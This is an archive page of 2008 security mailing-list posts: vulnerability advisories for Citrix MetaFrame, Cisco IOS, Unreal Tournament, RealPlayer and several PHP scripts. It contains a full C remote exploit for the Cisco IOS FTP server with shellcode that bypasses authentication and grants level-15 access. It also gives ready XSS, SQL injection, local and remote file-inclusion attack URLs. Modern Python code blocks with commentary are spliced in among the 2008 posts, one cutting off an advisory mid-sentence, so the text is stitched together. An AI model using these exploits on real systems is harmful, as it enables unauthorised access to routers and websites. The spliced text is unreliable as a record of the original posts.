Citrix MetaFrame Privilege Escalation

2008-07-30 Thread Wendel Guglielmetti Henrique
INTRUDERS TIGER TEAM SECURITY - SECURITY ADVISORY

http://www.intruders.com.br/
http://www.security.org.br/


ADVISORY/1907 - Citrix MetaFrame Privilege Escalation


PRIORITY: Low


I - INTRUDERS:




Intruders Tiger Team Security (http://www.intruders.com.br/) is a
SecurityLabs (http://www.security.org.br) division.

The Intruders Tiger Team Security (ITTS) is a group of researchers
with more than 10 years of experience, specializing in penetration
testing.


All penetration tests carried out so far by the Intruders Tiger Team
Security have been 100% successful.


II - INTRODUCTION:
--



Citrix Presentation Server, formerly known as Citrix MetaFrame Server, is
a remote application publishing product that allows people to connect
to applications available from central servers.

One advantage of publishing applications using Presentation Server is
that it lets people connect to those applications remotely, from their
homes, airport Internet kiosks, smart phones, and other devices
outside of their corporate networks.

From an end-user perspective, users can log in to their corporate
network from, for example, an airport kiosk, see all of the
applications they would see every day at work, including Outlook email
and any internal applications, and access them from the kiosk in a
secure environment.


III - DESCRIPTION:
--



Intruders Tiger Team Security identified a previously unknown vulnerability
in Citrix MetaFrame Presentation Server and Citrix MetaFrame XP.

The icabar.exe file, which starts the Citrix MetaFrame administration
toolbar, allows an attacker to escalate privileges on Windows 2000 and
earlier in the default configuration, and on Windows 2003 under some
special circumstances.


IV - ANALYSIS:
---



icabar.exe is launched at administrator logon to the desktop via the
Run registry key. Unfortunately the IcaBar value does not contain the
full path to the binary, which allows an attacker to escalate
privileges on Windows NT and 2000 in the default configuration and on
Windows 2003 in some circumstances.

Because the value is a bare file name, Windows searches for icabar.exe
in each directory listed in the PATH environment variable, in order.
If the attacker can write to any of those directories that appears
before the Citrix MetaFrame entry in PATH, the attacker can escalate
privileges.

The default file ACLs (Access Control Lists) of Windows NT and 2000 are
weak and allow any user to create files in the SystemDrive root (in
general C:\) and in many directories listed in PATH, which lets an
attacker create a fake icabar.exe and consequently escalate privileges.

However, exploitation depends on other software or on administrators
having added new PATH entries, for example the common
"%SystemDrive%\Program Files\SomeDirectory", where the directory is
set to Everyone/Full Control (the default on Windows 2000), or
directories that allow the local Users group to create and modify files
(special permissions set by Windows 2003).

As described in document CTX106052
(http://support.citrix.com/kb/entry.jspa?entryID=6032), Citrix
created a hotfix for MetaFrame Presentation Server 3.0 and a
workaround for MetaFrame XP, because Windows 2003 SP1 no longer allows
startup via the Run registry key without a full path.

However, this Citrix patch does not quote the full binary path stored
in the Run registry key, so an attacker can abuse the old 8.3 naming
convention during the binary search and, in some circumstances,
escalate privileges.



V. DETECTION:
-



Intruders Tiger Team Security confirmed the existence of this
vulnerability in the following Citrix Metaframe versions:

- Citrix MetaFrame Presentation Server 3.0 and below.
- Citrix MetaFrame XP 1.0 and below.


Newer versions may also be vulnerable.


VI. SUGGESTION:
--



There is no vendor patch.

WORKAROUND: Use the full binary path and quote the IcaBar value stored in
the Run registry key.


VII - CHRONOLOGY:
-



03/07/2005 - Vulnerability discovered during a Penetration Test.
07/19/2007 - Citrix Metaframe World Wide Team Contacted.
07/22/2007 - Citrix Metaframe World Wide Team Contacted - Second notification.
07/24/2007 - Citrix security staff - Investigating the possible flaw.
08/15/2007 - Citrix security staff - Have confirmed that this issue is
valid and are currently scoping the effort required to address it on
all affected platforms.
08/17/2007 - Citrix security staff - Currently do not have an accurate
estimate of how long it will take to roll out the public response.
09/17/2007 - Citrix security staff - Investigation into the full scope
of the issue you reported with the icabar.exe is not yet complete. At
this point though, we are performing due diligence to find any similar
issues that might exist in this
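The following audit helper is an added example, not part of the advisory or Citrix's own tooling. It classifies Run-key command strings the way the analysis above does (bare name that triggers a PATH search, unquoted full path, quoted full path), lists the PATH entries that are searched before the binary's own directory and are writable by unprivileged users, and produces the quoted form the workaround calls for. It goes one step beyond the advisory text in `unquoted_probe_sequence`, which reproduces the documented CreateProcess handling of unquoted paths containing spaces. Every path, PATH string and writable-directory set is a constructed placeholder (`ExampleVendor` is not a real Citrix install location); on a live system the PATH and ACL information would come from the registry and `icacls`.

```python
"""Run-key audit for the weakness the advisory describes: an unqualified or
unquoted command in the Run registry key. Added example (not the advisory's
or Citrix's code); every path, PATH string and writable-directory set below
is a constructed placeholder, not a real Citrix install location or ACL dump."""
import ntpath

# Constructed stand-in for the pre-hotfix IcaBar value: a bare file name,
# so Windows has to search PATH for it.
BARE_VALUE = "icabar.exe"
# Constructed stand-ins for a full-but-unquoted path and its quoted form.
UNQUOTED_VALUE = "C:\\Program Files\\ExampleVendor\\icabar.exe"
QUOTED_VALUE = '"C:\\Program Files\\ExampleVendor\\icabar.exe"'
# Constructed PATH with the vendor directory deliberately listed last.
SAMPLE_PATH = ("C:\\;C:\\WINNT\\system32;C:\\WINNT;"
               "C:\\Program Files\\Shared Tools;C:\\Program Files\\ExampleVendor")
# Constructed set of PATH entries writable by non-administrators (the advisory
# names the system-drive root on default NT/2000 ACLs as one such place).
SAMPLE_WRITABLE = {"C:\\", "C:\\Program Files\\Shared Tools"}


def classify_run_value(value):
    """'bare' (PATH search needed), 'unquoted-path' or 'quoted-path'."""
    v = value.strip()
    if v.startswith('"'):
        return "quoted-path"
    drive, _ = ntpath.splitdrive(v)
    if drive or v.startswith("\\"):
        return "unquoted-path"
    return "bare"


def _norm(d):
    # Case-insensitive comparison without a trailing backslash.
    return ntpath.normcase(d).rstrip("\\")


def search_order(path_env, exe_name):
    """Candidate files, in order, when a bare name is resolved through PATH."""
    return [ntpath.join(d, exe_name) for d in path_env.split(";") if d]


def exposed_entries(path_env, exe_dir, writable_dirs):
    """PATH entries that come before the binary's own directory and are
    writable by unprivileged users: a look-alike placed there is found first."""
    writable = {_norm(w) for w in writable_dirs}
    exposed = []
    for d in (d for d in path_env.split(";") if d):
        if _norm(d) == _norm(exe_dir):
            break
        if _norm(d) in writable:
            exposed.append(d)
    return exposed


def unquoted_probe_sequence(value):
    """Executables CreateProcess tries for an unquoted command containing
    spaces, in order, before it reaches the full path (documented Windows
    behaviour; this goes beyond what the advisory itself states)."""
    parts = value.split(" ")
    return [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))] + [value]


def harden_run_value(full_path):
    """The advisory's workaround: store the full path, quoted."""
    return '"%s"' % full_path.strip().strip('"')


def audit(value, path_env, writable_dirs, exe_dir):
    """One-line verdict per Run value, suitable for a report."""
    kind = classify_run_value(value)
    if kind == "bare":
        exposed = exposed_entries(path_env, exe_dir, writable_dirs)
        return "bare name; writable PATH entries searched first: %s" % (exposed or "none")
    if kind == "unquoted-path" and " " in value:
        return "unquoted path; probes %s first" % unquoted_probe_sequence(value)[0]
    return "ok"


if __name__ == "__main__":
    for v in (BARE_VALUE, UNQUOTED_VALUE, QUOTED_VALUE):
        print(v, "->", audit(v, SAMPLE_PATH, SAMPLE_WRITABLE,
                             "C:\\Program Files\\ExampleVendor"))
```

The ordering check in `exposed_entries` is the point of the advisory's analysis: a writable directory is only a problem if Windows probes it before the directory that actually holds icabar.exe, so a PATH that lists the vendor directory first is not exposed by this particular value even when C:\ is world-writable.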

DEV WMS Multiple Vulnerabilities

2008-07-30 Thread irancrash



Script : DEV WMS


Type : Multiple Vulnerabilities ( Local File Inclusion / Cross Site Scripting / SQL Injection )


Alert : High





Discovered by : Khashayar Fereidani Or Dr.Crash


My Website : HTTP://FEREIDANI.IR


Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com





Script Download : http://dev-wms.sourceforge.net/





XSS Vulnerability 1 :


Variable Sent Method : GET


Vulnerable Variable : session


Address : 
http://Example.com/?session=";>><>>alert(document.cookie)


Solution : filter session variable with htmlspecialchars() function ...





Xss Vulnerability 2 : 


Variable Sent Method : POST


Vulnerable Variable : kluc


Address : http://Example.com/index.php?session=0&action=search


Change example.com to the script address on a real site and save as ircrash.html,
open the file with a browser and see your cookie.








http://Example.com/index.php?session=0&action=search"; 
method="POST" name="form">












Solution : filter kluc variable with htmlspecialchars() function ...




SQL Injection :


Method Of Send : GET


Vulnerable Variable : article


Address : 
http://Example.com/index.php?session=0&action=read&click=open&article=[SQL CODE]


Solution : Filter dangerous characters in the article variable ...




Local file inclusion :


Method Of Send : GET


Vulnerable Variable : step


Address : http://Example.com/admin/index.php?start=install&step=file.type%00


Solution : Filter the step variable with an if check ...





Tnx : God


 HTTP://IRCRASH.COM





[ MDVSA-2008:158 ] silc-toolkit

2008-07-30 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2008:158
 http://www.mandriva.com/security/
 ___

 Package : silc-toolkit
 Date: July 30, 2008
 Affected: 2008.0
 ___

 Problem Description:

 A vulnerability was found in the SILC toolkit before version 1.1.5
 that allowed a remote attacker to cause a denial of service (crash),
 or possibly execute arbitrary code via long input data (CVE-2008-1227).
 
 A vulnerability was found in the SILC toolkit before version 1.1.7
 that allowed a remote attacker to execute arbitrary code via a crafted
 PKCS#2 message (CVE-2008-1552).
 
 The updated packages have been patched to correct these issues.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1227
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1552
 ___

 Updated Packages:

 Mandriva Linux 2008.0:
 35e5d87de2aff27596270ae9e55ca8dd  
2008.0/i586/libsilc-1.1_2-1.1.2-2.1mdv2008.0.i586.rpm
 efaac773338d54d32b51b0d53e55483b  
2008.0/i586/libsilcclient-1.1_2-1.1.2-2.1mdv2008.0.i586.rpm
 873726229e4b414b8c422b424edd2dcc  
2008.0/i586/silc-toolkit-1.1.2-2.1mdv2008.0.i586.rpm
 a1c102dd0788cc8ef7f48aa6bea26331  
2008.0/i586/silc-toolkit-devel-1.1.2-2.1mdv2008.0.i586.rpm 
 08dfd9be2c32c9ebac8da73803f62c6f  
2008.0/SRPMS/silc-toolkit-1.1.2-2.1mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 07b24c79c06810497cf581e7eeb06a11  
2008.0/x86_64/lib64silc-1.1_2-1.1.2-2.1mdv2008.0.x86_64.rpm
 29075aa71e7e63b02e54001610facfea  
2008.0/x86_64/lib64silcclient-1.1_2-1.1.2-2.1mdv2008.0.x86_64.rpm
 79d595aeb0f9764d6b5563097f7e958c  
2008.0/x86_64/silc-toolkit-1.1.2-2.1mdv2008.0.x86_64.rpm
 855026158877e6963e81d4d1ab95f6f6  
2008.0/x86_64/silc-toolkit-devel-1.1.2-2.1mdv2008.0.x86_64.rpm 
 08dfd9be2c32c9ebac8da73803f62c6f  
2008.0/SRPMS/silc-toolkit-1.1.2-2.1mdv2008.0.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFIkIxKmqjQ0CJFipgRAnBmAJ4psfbA7p2U1Rhz/5cZfzYumei50gCfdKNU
dywXt33a4KyNAkhSPCwcNgE=
=AG6M
-END PGP SIGNATURE-



Cisco IOS shellcode explanation - additional

2008-07-30 Thread Andy Davis
Anyone spot the typo? It's also in a comment in the exploit source,
but doesn't affect how the code works:

"addi7,7,233" should read "addi7,7,2330"

The first offset (requirement to authenticate) is at 0x174 and the
second (privilege level) is at 0xde4

It's worth noting that at some stage around IOS 12.4 this structure
changed slightly and therefore if you were planning on exploiting
12.4(7a), which is also vulnerable to the FTP stack overflow, the
offsets are 0x17c and 0xdec

Cheers,

Andy


On Wed, Jul 30, 2008 at 10:03 AM, Andy Davis
<[EMAIL PROTECTED]> wrote:
> Hi,
>
> Lots of people have been asking for details about the slightly
> unorthodox shellcode I used within the IOS FTP exploit, so here goes:
>
> .equ vty_info, 0x8182da60   //contains a pointer to the VTY info structure
> .equ terminate, 0x80e4086c
>
> lis     4,vty_info@ha
> la      4,vty_info@l(4)
> xor     8,8,8        //Clear r8
> lwzx    7,4,8        //Get pointer to VTY info structure
> stw     8,372(7)     //Write zero to first offset to remove
>                      //the requirement to enter a password
> subi    8,8,1        //Set r8 to be 0x
> addi    7,7,233      //Add second offset in two steps to
>                      //avoid nulls in the shellcode
> stw     8,1226(7)    //Write 0x to second offset to
>                      //priv escalate to level 15
>                      //(technically this should be 0xff10
>                      //but 0x works and is more efficient)
> mr      3,8          //Use 0x as a parameter
>                      //to pass to terminate()
> lis     4,terminate@ha
> la      4,terminate@l(4)
> mtctr   4
> bctr                 //terminate "this process"
>                      //(current connection to the FTP server)
>
>
> Cheers,
>
> Andy
>


Tool: PorkBind Nameserver Security Scanner

2008-07-30 Thread super
In light of the new DNS cache poisoning issue and now that everyone has had 
plenty of time to apply patches, I've decided to release a new version of my 
nameserver security scanner called porkbind. It is a multi-threaded nameserver 
scanner that can recursively query nameservers of subdomains for version 
strings. (i.e. sub.host.dom's nameservers then host.dom's nameservers) 
After acquiring the version strings it tests them against version numbers 
from CERT advisories and reports back to the user. Zone transfer 
capability is also tested for. It is available for download at:


http://innu.org/~super/tools/porkbind-1.2.tar.gz

- Derek
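The announcement above describes two pieces of logic: walking from a host's own nameservers up through each parent domain, and comparing each returned version string against advisory data. The block below is an added example of that logic, not PorkBind's code. It performs no network I/O: the nameserver table and the `version.bind` answers are constructed, and the advisory table holds obviously fictitious version numbers (`9.4.9-P9`, `EXAMPLE-ADVISORY-A`) rather than real CERT data, so a practitioner would replace it with the real fixed-version list before relying on the output.

```python
"""Version-string triage in the style PorkBind's announcement describes.
Added example, not PorkBind's code. No DNS traffic is sent: the NS table,
the version answers and the advisory table are constructed placeholders."""
import re

# Constructed placeholder advisory table, NOT real CERT data:
# (branch prefix, first fixed version in that branch, label)
ADVISORIES = [
    ((9, 4), "9.4.9-P9", "EXAMPLE-ADVISORY-A"),
    ((9, 3), "9.3.9-P9", "EXAMPLE-ADVISORY-B"),
]

# Constructed NS delegation data and constructed version.bind answers.
SAMPLE_NS = {
    "sub.host.dom": ["ns.sub.host.dom"],
    "host.dom": ["ns1.host.dom", "ns2.host.dom"],
}
SAMPLE_ANSWERS = {
    "ns.sub.host.dom": "surely you must be joking",   # operator hid the version
    "ns1.host.dom": "9.4.1-P1",
    "ns2.host.dom": "9.4.9-P9",
}


def parent_chain(fqdn):
    """sub.host.dom -> ['sub.host.dom', 'host.dom']; the bare TLD is skipped."""
    labels = fqdn.strip(".").split(".")
    return [".".join(labels[i:]) for i in range(len(labels) - 1)]


def parse_bind_version(text):
    """'9.4.1-P1' -> ((9, 4, 1), 1); anything that is not a BIND-style
    version string -> None (hidden or spoofed banners land here)."""
    m = re.match(r"^(\d+(?:\.\d+)*)(?:-P(\d+))?", text.strip())
    if not m:
        return None
    nums = tuple(int(x) for x in m.group(1).split("."))
    patch = int(m.group(2)) if m.group(2) else 0
    return (nums, patch)


def version_key(parsed):
    """Comparable tuple: pad the dotted part to three components, then -P level."""
    nums, patch = parsed
    return tuple(nums) + (0,) * (3 - len(nums)) + (patch,)


def findings(version_text):
    """Advisory labels that apply to this version string (branch match and
    older than the first fixed release), or a note when nothing can be parsed."""
    parsed = parse_bind_version(version_text)
    if parsed is None:
        return ["unparseable or hidden version string"]
    hits = []
    for branch, fixed, label in ADVISORIES:
        if parsed[0][:2] == branch and version_key(parsed) < version_key(parse_bind_version(fixed)):
            hits.append(label)
    return hits


def scan(fqdn, ns_table, version_table):
    """Walk the parent chain, collect each zone's nameservers and triage them."""
    report = {}
    for zone in parent_chain(fqdn):
        for ns in ns_table.get(zone, []):
            report[ns] = findings(version_table.get(ns, ""))
    return report


if __name__ == "__main__":
    for ns, result in scan("sub.host.dom", SAMPLE_NS, SAMPLE_ANSWERS).items():
        print(ns, "->", result or "no matching advisories")
```

Treating an unparseable banner as a finding rather than silently skipping it matters in practice: a hidden version string is not evidence of a patched server, only of a server that should be checked another way.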


RealNetworks RealPlayer ActiveX Illegal Resource Reference Vulnerability

2008-07-30 Thread cocoruder
RealNetworks RealPlayer ActiveX Illegal Resource Reference Vulnerability

by cocoruder(frankruder_at_hotmail.com)
http://ruder.cdut.net


Summary:

An illegal resource reference vulnerability exists in the ActiveX
Control of RealNetworks RealPlayer. To exploit the vulnerability,
the attacker may build a special web page and lure the victim into
visiting it; if RealPlayer is installed on the local system, local
resources (or any other illegal resources) will be accessed. This
vulnerability may assist in the exploitation of other vulnerabilities.



Affected Software Versions:

RealPlayer 10.6 and previous versions
(other versions may also be affected)



Details:

Currently no details have been released.



Solution:

The vendor has fixed this vulnerability; the vendor's advisory is
available at:

http://service.real.com/realplayer/security/07252008_player/en/



CVE Information:

CVE-2008-3064



Disclosure Timeline:

2006.12.19  Vendor notified
2006.12.20  Vendor responded
2008.07.23  Notified by the vendor that patch and advisory were coming
2008.07.25  Vendor's advisory released
2008.07.29  Advisory released



--EOF--


MJGuest 6.8 GT Cross Site Scripting Vulnerability

2008-07-30 Thread irancrash



Script : MJGuest 6.8 GT


Type : Cross Site Scripting Vulnerability


Alert : Medium





Discovered by : Khashayar Fereidani


Our Team : IRCRASH


My Official Website : HTTP://FEREIDANI.IR


Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com





Khashayar Fereidani Official Website : HTTP://FEREIDANI.IR





Script Download : http://www.mdsjack.bo.it/files/mjguest_6.8gt.zip




XSS Vulnerability :


Invalid Code : ./guestbook.js.php => document.write('' + '' + '');


Vulnerable variable : link


Address : http://Example/guestbook.js.php?link=[XSS]


Solution : Filter link variable with htmlspecialchars() function .





Tnx : God


 HTTP://IRCRASH.COM





NULL pointer in Unreal Tournament 2004 v3369

2008-07-30 Thread Luigi Auriemma

###

 Luigi Auriemma

Application:  Unreal Tournament 2004
  http://www.unrealtournament2003.com/ut2004/index.html
Versions: <= v3369
Platforms:Windows and Linux
Bug:  NULL pointer
Exploitation: remote, versus server
Date: 30 Jul 2008
Author:   Luigi Auriemma
  e-mail: [EMAIL PROTECTED]
  web:aluigi.org


###


1) Introduction
2) Bug
3) The Code
4) Fix


###

===
1) Introduction
===


Unreal Tournament 2004 is a well known FPS game developed by Epic Games
(http://www.epicgames.com) and released at the beginning of 2004.


###

==
2) Bug
==


Through a specific sequence of packets an attacker is able to crash the
UT2004 server due to a NULL pointer exception.


###

===
3) The Code
===


http://aluigi.org/poc/ut2004null.zip


###

==
4) Fix
==


No fix


###


--- 
Luigi Auriemma
http://aluigi.org
http://backup.aluigi.org
http://mirror.aluigi.org


HIOX Browser Statistics 2.0 Remote File Inclusion Vulnerability

2008-07-30 Thread Ghost hacker



 HIOX Browser Statistics 2.0 Remote File Inclusion Vulnerability
 Ghost Hacker , R-h Team , Real Hack We Will Be Back Soon :)

[~] Found by : Ghost Hacker  - R-H Team -  |,  .-.  .-.  ,|
[~] My Blog : http://gh0st10.wordpress.com | )(_o/  \o_)( |
[~] My Email : [EMAIL PROTECTED]  |/ /\ \|
[~] Name Script : HIOX Browser Statistics 2.0
[~] Download : http://www.hscripts.com/scripts/php/downloads/HBS_2_0.zip
#[ I love the Messenger of Allah Mohammad ]#
[~] Error (hioxupdate.php + hioxstats.php) :
include "$hm/browser.php";
[~] Exploit :
http://.com/[path]/hioxupdate.php?hm=Evil_Code
http://.com/[path]/hioxstats.php?hm=Evil_Code
#[ I love the Messenger of Allah Mohammad ]#
[~] Greetz :
Mr.SaFa7 & RoMaNcYxHaCkEr & Night Mare & Root Hacker & Dmar al3noOoz ,
All Members Real Hack & Members Arabs Security And All My Friends ,

 Ghost Hacker , R-h Team , Real Hack We Will Be Back Soon :)

_
Express yourself instantly with MSN Messenger! Download today it's FREE!
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/

HIOX Random Ad 1.3 (hioxRandomAd.php hm) RFI Vulnerability

2008-07-30 Thread Ghost hacker



 HIOX Random Ad 1.3 (hioxRandomAd.php hm) RFI Vulnerability
 Ghost Hacker , R-h Team , Real Hack We Will Be Back Soon :)

[~] Found by : Ghost Hacker  - R-H Team -  |,  .-.  .-.  ,|
[~] My Blog : http://gh0st10.wordpress.com | )(_o/  \o_)( |
[~] My Email : [EMAIL PROTECTED]  |/ /\ \|
[~] Name Script : HIOX Random Ad 1.3
[~] Download : http://www.hscripts.com/scripts/php/downloads/HRA_1_3.zip
#[ I love the Messenger of Allah Mohammad ]#
[~] Error (hioxRandomAd.php) :
include "$hm/admin/props.php";
[~] Exploit :
http://.com/[path]/hioxRandomAd.php?hm=Evil_Code
#[ I love the Messenger of Allah Mohammad ]#
[~] Greetz :
Mr.SaFa7 & Night Mare & Root Hacker & Dmar al3noOoz ,
All Members Real Hack & Members Arabs Security And All My Friends ,

 Ghost Hacker , R-h Team , Real Hack We Will Be Back Soon :)


RE: Remote Cisco IOS FTP exploit

2008-07-30 Thread Paul Oxman (poxman)
 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Hello,
This is Paul Oxman with Cisco PSIRT.

The Cisco published advisory that Andy references is 
located at:

http://www.cisco.com/warp/public/707/cisco-sa-20070509-iosftp.shtml 

Regards

Name:Paul Oxman
Phone:   +65 6317 7418
Mobile:  +65 9111 0157
Title:   PSIRT Incident Manager
PGP Key: 0x6EA839A6

Have you seen the new Cisco Security Center yet?
http://www.cisco.com/security

- -Original Message-
From: Andy Davis [mailto:[EMAIL PROTECTED] 
Sent: Tuesday, 29 July 2008 6:31 PM
To: bugtraq@securityfocus.com
Subject: Remote Cisco IOS FTP exploit

Hi,

The IOS FTP server vulnerabilities were published in an advisory by
Cisco in May 2007. The FTP server does not run by default, it is not
widely used and has since been removed from new versions of IOS.
Therefore, I took the decision to release this exploit code in order
to show that IOS can be reliably exploited to provide remote level 15
exec shell access. This clearly demonstrates that patching your
router
is just as important as patching your servers.

To prevent its widespread abuse I have omitted a critical step which
means that it will only work when the router is connected to a
debugger - not something you are likely to encounter on the Internet

Anyway, hopefully this will promote further IOS security research as
there's plenty left to look at!

Cheers,

Andy




/*

 Cisco IOS FTP server remote exploit by Andy Davis 2008

 Cisco Advisory ID: cisco-sa-20070509-iosftp - May 2007

 Specific hard-coded addresses for IOS 12.3(18) on a 2621XM router

 Removes the requirement to authenticate and escalates to level 15


*
 To protect the innocent a critical step has been omitted, which means
 the shellcode will only execute when the router is attached to gdb.
 I'm sure the PowerPC shellcoders out there will work it out...

*

 Thanks to Gyan Chawdhary and Varun Uppal for all the hours they spent
 on the original IOS security research

 iosftpexploit  googlemail 'dot' com

*/

/* Header names were lost in the mail archive; these are the standard
   headers the calls below (printf, exit, socket, inet_addr) require. */
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#define PORT 21

int main(int argc, char **argv)
{
unsigned char sendbuf[] =

"MKD "

/* .equ vty_info, 0x8182da60    # pointer to VTY info */
/* .equ terminate, 0x80e4086c   # kill a process */

"\x3c\x80\x81\x83"  /* lis     4,vty_info@ha */
"\x38\x84\xda\x60"  /* la      4,vty_info@l(4) */
"\x7d\x08\x42\x78"  /* xor     8,8,8 */
"\x7c\xe4\x40\x2e"  /* lwzx    7,4,8 */
"\x91\x07\x01\x74"  /* stw     8,372(7) */
"\x39\x08\xff\xff"  /* subi    8,8,1 */
"\x38\xe7\x09\x1a"  /* addi    7,7,233 */
"\x91\x07\x04\xca"  /* stw     8,1226(7) */
"\x7d\x03\x43\x78"  /* mr      3,8 */
"\x3c\x80\x80\xe4"  /* lis     4,terminate@ha */
"\x38\x84\x08\x6c"  /* la      4,terminate@l(4) */
"\x7c\x89\x03\xa6"  /* mtctr   4 */
"\x4e\x80\x04\x20"  /* bctr */

/* exits cleanly without adversely affecting the FTP server */

"\x61\x61\x61\x61"  /* padding */
"\x61\x61\x61\x61"  /* padding */
"\x61\x61\x61\x61"  /* padding */
"\x61\x61\x61\x61"  /* padding */
"\x61\x61\x61\x61"  /* padding */
"\x61\x61\x61\x61"  /* padding */

"\x80\x06\x23\xB8"  /* return address */
"\x0d\x0a";

/* trampoline code */
/* when the overflow occurs r26+0x14 points to the shellcode */
/*
0x800623B8  lwz     26, 20(26)
0x800623BC  mtctr   26
0x800623C0  mr      3, 27
0x800623C4  bctrl
*/

unsigned char recvbuf[256];
struct sockaddr_in servaddr;
int s;

if (argc != 2)
{
printf ("\nCisco IOS FTP server remote exploit by Andy Davis 2008\n");

printf ("\nUsage: %s \n",argv[0]);
exit(-1);
}

servaddr.sin_family = AF_INET;
servaddr.sin_addr.s_addr = inet_addr(argv[1]);
servaddr.sin_port = htons(PORT);

s = socket(AF_INET, SOCK_STREAM, 0);
connect (s, (struct sockaddr *) &servaddr, sizeof(servaddr));
printf ("\nCisco IOS FTP server remote exploit by Andy Davis 2008\n");
printf ("Specific offsets for IOS 12.3(18) on a 2621XM router\n\n");
printf ("Sending exploit...\n\n");

if (send(s, sendbuf, sizeof(sendbuf)-1, 0) == 0)
{
printf("Error sending packet...quitting\n\n");
exit (1);
}
recv (s, recvbuf, sizeof(recvbuf)-1,0);
printf ("Now telnet to the router for a shell...\n\n");
return 0;
}

-BEGIN PGP SIGNATURE-
Version: PGP 8.1

iQA/AwUBSJAKwPOp/xnPFP7gEQLWogCaA0m3ex0cupS0QEHsyPpWsfnGcqoAn0Ua
fVdMozEjWSONap4CwIpMNznt
=Hchp
-END PGP SIGNATURE-


Memory corruption and NULL pointer in Unreal Tournament III 1.2

2008-07-30 Thread Luigi Auriemma

###

 Luigi Auriemma

Application:  Unreal Tournament III
  http://www.unrealtournament3.com
Versions: <= 1.2 and 1.3beta4
Platforms:Windows (tested), Linux, PS3 and Xbox360
Bugs: A] memory corruption
  B] NULL pointer
Exploitation: remote, versus server
Date: 30 Jul 2008
Author:   Luigi Auriemma
  e-mail: [EMAIL PROTECTED]
  web:aluigi.org


###


1) Introduction
2) Bugs
3) The Code
4) Fix


###

===
1) Introduction
===


Unreal Tournament III is the latest game (2007) of the Unreal series
created by Epic Games (http://www.epicgames.com).


###

===
2) Bugs
===


A] memory corruption


UT3 is affected by a problem in the handling of a specific type of
packet. In this particular type of packet there is a 16 bit field which
specifies the size of the data that follows and if this string is
longer than about 172 bytes a memory corruption will occur allowing an
attacker to control various registers which could allow the execution
of malicious code.


---
B] NULL pointer
---

If the amount of data I talked about previously is bigger than the
total size of the packet, the string will not be read and a NULL pointer
exception will occur.
This type of bug is easily recognizable on the server because the
message "Error: Attempted to multiply free a voice packet" is
displayed before the crash when the malformed packet is received.


###

===
3) The Code
===


http://aluigi.org/poc/ut3mendo.zip


###

==
4) Fix
==


No fix


###


--- 
Luigi Auriemma
http://aluigi.org
http://backup.aluigi.org
http://mirror.aluigi.org
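The two bugs above are the two halves of one missing check on a 16-bit length field: bug A is a declared length larger than the fixed buffer the data is copied into, bug B is a declared length larger than the bytes actually present in the packet. The parser below is an added example (not Epic's code and not the author's PoC) showing both checks in the order a receiver should apply them. The packet layout is a constructed minimal one, a type byte followed by a little-endian 16-bit length and the payload, since the advisory does not describe the real framing; the 172-byte limit is the approximate figure the advisory quotes.

```python
"""Length-prefixed packet parser with the two checks the UT3 advisory implies
are missing. Added example, not Epic's code or the author's PoC. The layout is
constructed (1-byte type, 16-bit little-endian length, payload); the 172-byte
limit is the approximate figure the advisory gives."""
import struct

HEADER = struct.Struct("<BH")   # type byte + 16-bit length field (3 bytes)
MAX_VOICE_DATA = 172            # approximate fixed-buffer size per the advisory
VOICE_TYPE = 0x01               # constructed type value for this example


class MalformedPacket(ValueError):
    def __init__(self, reason, detail):
        super().__init__("%s: %s" % (reason, detail))
        self.reason = reason


def parse_voice_packet(data):
    """Return the payload, or raise MalformedPacket tagged with a reason.

    overrun  - declared length exceeds the bytes actually received (bug B:
               the read would run past the end of the packet)
    overflow - declared length exceeds the fixed destination buffer (bug A:
               the copy would corrupt memory)
    """
    if len(data) < HEADER.size:
        raise MalformedPacket("truncated", "header needs %d bytes" % HEADER.size)
    ptype, length = HEADER.unpack_from(data, 0)
    if ptype != VOICE_TYPE:
        raise MalformedPacket("type", "unexpected packet type %#x" % ptype)
    remaining = len(data) - HEADER.size
    if length > remaining:
        raise MalformedPacket("overrun", "length %d > %d remaining" % (length, remaining))
    if length > MAX_VOICE_DATA:
        raise MalformedPacket("overflow", "length %d > buffer %d" % (length, MAX_VOICE_DATA))
    return bytes(data[HEADER.size:HEADER.size + length])


def build_voice_packet(payload, declared_length=None):
    """Constructed packet builder; declared_length lets a test forge the field."""
    n = len(payload) if declared_length is None else declared_length
    return HEADER.pack(VOICE_TYPE, n) + payload


def classify(data):
    """'ok' or the reason tag, for counting rejected packets in server logs."""
    try:
        parse_voice_packet(data)
        return "ok"
    except MalformedPacket as exc:
        return exc.reason


if __name__ == "__main__":
    samples = {
        "normal": build_voice_packet(b"A" * 10),
        "bug B shape": build_voice_packet(b"A" * 10, declared_length=500),
        "bug A shape": build_voice_packet(b"A" * 300),
    }
    for name, pkt in samples.items():
        print(name, "->", classify(pkt))
```

Checking the declared length against the bytes present before checking it against the buffer size is deliberate: the first check only needs the packet itself, and a packet that fails it must never reach the copy at all, which is exactly the path the advisory's bug B describes.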


HIOX Star Rating System 1.0 Remote File Inclusion Vulnerability

2008-07-30 Thread Ghost hacker



 HIOX Star Rating System 1.0 Remote File Inclusion Vulnerability
 Ghost Hacker , R-h Team , Real Hack We Will Be Back Soon :)

[~] Found by : Ghost Hacker  - R-H Team -  |,  .-.  .-.  ,|
[~] My Blog : http://gh0st10.wordpress.com | )(_o/  \o_)( |
